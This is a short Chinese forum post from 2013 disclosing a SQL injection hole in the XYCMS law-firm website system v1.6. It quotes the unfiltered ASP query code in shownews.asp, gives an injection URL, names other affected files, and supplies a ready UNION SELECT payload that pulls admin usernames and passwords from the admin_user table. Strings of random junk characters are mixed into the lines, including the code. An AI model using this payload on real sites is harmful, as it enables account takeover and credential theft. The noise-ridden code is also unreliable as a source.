前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
9 Y4 L3 s! `& T, P8 o7 h6 k' h, `
0 |) n1 o! f( P( {! ^ f1 _, w淫荡分割线$ Q7 f6 L& }% M/ u2 o
--------------------------------------------------------+ j6 j, m; n' r4 f A
8 P3 c) O8 N2 A+ v5 {
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
9 s U7 M5 n( I F源码地址:http://down.chinaz.com/soft/29233.htm' R1 G5 L$ I! l% C
7 A: Y i3 ^4 o8 \% q漏洞文件:shownews.asp
, N- [: n/ t4 B2 W4 Q漏洞代码:7-13行2 X8 G, |. L( V- ~, K
/ U+ L$ N& W, }9 ?
' B& R' t# |3 R' `6 c' _<%
9 u# y# ~0 R& S, l9 g2 x- Did=request.QueryString("id"); g t0 J# W/ N6 Z6 I W# I
! ?% h# d' s) {3 N% s; O: A5 [9 ~
set snews=server.createobject("adodb.recordset") 6 I, r2 g, R4 S% D3 q
exec="select * from [news] where id="&id
$ W7 x) x8 {7 \/ d& _# ssnews.open exec,conn,1,1( Q: q+ s5 S. M8 Z1 B
%>
$ ]- n5 @3 A6 E2 \* p
' e# ?/ Y/ u; k- ?0 @' Z
9 R+ |+ u" M& z, ` N2 s什么过滤都没有 直造成注入. O0 Q$ [8 D2 l; a! R$ t0 d" U
! }3 E$ F2 z8 r( E注入点:http://127.0.0.1:99/shownews.asp?id=xx$ F% v1 j3 a8 H3 {6 k1 z- J
" s' G5 I& ^- y
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
: E8 ?: L" j4 @ M5 \ 5 n9 B' [/ s0 J; A/ j& `% B
$ a& T6 Z9 {" p" k% L: k3 L9 v' Nexp: union select 1,admin,password,4,5,7 from admin_user: @1 o, I! C/ f5 \4 F
9 c9 y0 [. \2 b% h |
发表于 2013-4-4 17:28:12
收藏
支持
反对